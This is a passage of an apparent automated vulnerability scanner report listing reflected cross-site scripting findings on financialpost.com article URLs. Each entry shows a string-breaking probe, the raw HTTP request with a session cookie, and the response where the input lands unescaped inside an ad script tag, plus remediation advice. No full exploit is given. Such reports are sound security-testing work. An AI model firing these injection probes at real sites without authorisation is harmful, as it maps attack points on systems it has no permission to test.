The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba574'%3b9b0c1337c4a was submitted in the REST URL parameter 1. This input was echoed as ba574';9b0c1337c4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneurba574'%3b9b0c1337c4a/Partners+leverage+gift+card+idea/3931988/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82924
Expires: Sun, 19 Dec 2010 03:14:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurba574';9b0c1337c4a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurba574';9b0c1337c4a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=36654678?">
...[SNIP]...

1.63. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547fc'%3b614300144fa was submitted in the REST URL parameter 3. This input was echoed as 547fc';614300144fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Partners+leverage+gift+card+idea/3931988547fc'%3b614300144fa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54486
Expires: Sun, 19 Dec 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners-leverage-gift-card-idea/3931988547fc';614300144fa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners-leverage-gift-card-idea;kw=3931988547fc';614300144fa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.64. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38251'%3b14ab344cd5d was submitted in the REST URL parameter 4. This input was echoed as 38251';14ab344cd5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Partners+leverage+gift+card+idea/3931988/38251'%3b14ab344cd5d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37570


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners%20leverage%20gift%20card%20idea/3931988/38251';14ab344cd5d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners%20leverage%20gift%20card%20idea;kw=3931988;kw=38251';14ab344cd5d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag
...[SNIP]...

1.65. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Social+media+gives+medium+life/3931982/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2289'%3bea2284d08bf was submitted in the REST URL parameter 1. This input was echoed as b2289';ea2284d08bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneurb2289'%3bea2284d08bf/Social+media+gives+medium+life/3931982/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78583
Expires: Sun, 19 Dec 2010 03:14:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurb2289';ea2284d08bf/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurb2289';ea2284d08bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25921326?">
...[SNIP]...

1.66. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Social+media+gives+medium+life/3931982/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314a3'%3b231830f9dd8 was submitted in the REST URL parameter 3. This input was echoed as 314a3';231830f9dd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Social+media+gives+medium+life/3931982314a3'%3b231830f9dd8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54415
Expires: Sun, 19 Dec 2010 03:14:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social-media-gives-medium-life/3931982314a3';231830f9dd8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social-media-gives-medium-life;kw=3931982314a3';231830f9dd8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'
...[SNIP]...

1.67. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Social+media+gives+medium+life/3931982/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc98'%3ba15a08852bc was submitted in the REST URL parameter 4. This input was echoed as afc98';a15a08852bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Social+media+gives+medium+life/3931982/afc98'%3ba15a08852bc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44342


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social%20media%20gives%20medium%20life/3931982/afc98';a15a08852bc/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social%20media%20gives%20medium%20life;kw=3931982;kw=afc98';a15a08852bc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+s
...[SNIP]...

1.68. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Strategy+comes+easy/3931965/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f775e'%3b6b7ab346bbb was submitted in the REST URL parameter 1. This input was echoed as f775e';6b7ab346bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneurf775e'%3b6b7ab346bbb/Strategy+comes+easy/3931965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81970
Expires: Sun, 19 Dec 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurf775e';6b7ab346bbb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurf775e';6b7ab346bbb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=45520954?">
...[SNIP]...

1.69. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Strategy+comes+easy/3931965/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6435'%3b4f2bbbc1920 was submitted in the REST URL parameter 3. This input was echoed as b6435';4f2bbbc1920 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Strategy+comes+easy/3931965b6435'%3b4f2bbbc1920/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54006
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy-comes-easy/3931965b6435';4f2bbbc1920/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy-comes-easy;kw=3931965b6435';4f2bbbc1920;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=3973656
...[SNIP]...

1.70. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Strategy+comes+easy/3931965/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645f3'%3b095502b1fd7 was submitted in the REST URL parameter 4. This input was echoed as 645f3';095502b1fd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Strategy+comes+easy/3931965/645f3'%3b095502b1fd7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44013


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy%20comes%20easy/3931965/645f3';095502b1fd7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy%20comes%20easy;kw=3931965;kw=645f3';095502b1fd7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...

1.71. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Virtual+training/3967328/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6640b'%3b10be691c8d7 was submitted in the REST URL parameter 1. This input was echoed as 6640b';10be691c8d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur6640b'%3b10be691c8d7/Virtual+training/3967328/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83218
Expires: Sun, 19 Dec 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur6640b';10be691c8d7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur6640b';10be691c8d7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50079065?">
...[SNIP]...

1.72. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Virtual+training/3967328/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb40f'%3b9d8ba420d75 was submitted in the REST URL parameter 3. This input was echoed as eb40f';9d8ba420d75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Virtual+training/3967328eb40f'%3b9d8ba420d75/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53895
Expires: Sun, 19 Dec 2010 03:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual-training/3967328eb40f';9d8ba420d75/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual-training;kw=3967328eb40f';9d8ba420d75;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68303724?"
...[SNIP]...

1.73. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Virtual+training/3967328/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504a'%3b07f3b9742b1 was submitted in the REST URL parameter 4. This input was echoed as 7504a';07f3b9742b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Virtual+training/3967328/7504a'%3b07f3b9742b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44723


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual%20training/3967328/7504a';07f3b9742b1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual%20training;kw=3967328;kw=7504a';07f3b9742b1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=7895
...[SNIP]...

1.74. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/advice/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d93'%3be0889b50b05 was submitted in the REST URL parameter 1. This input was echoed as 74d93';e0889b50b05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur74d93'%3be0889b50b05/advice/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
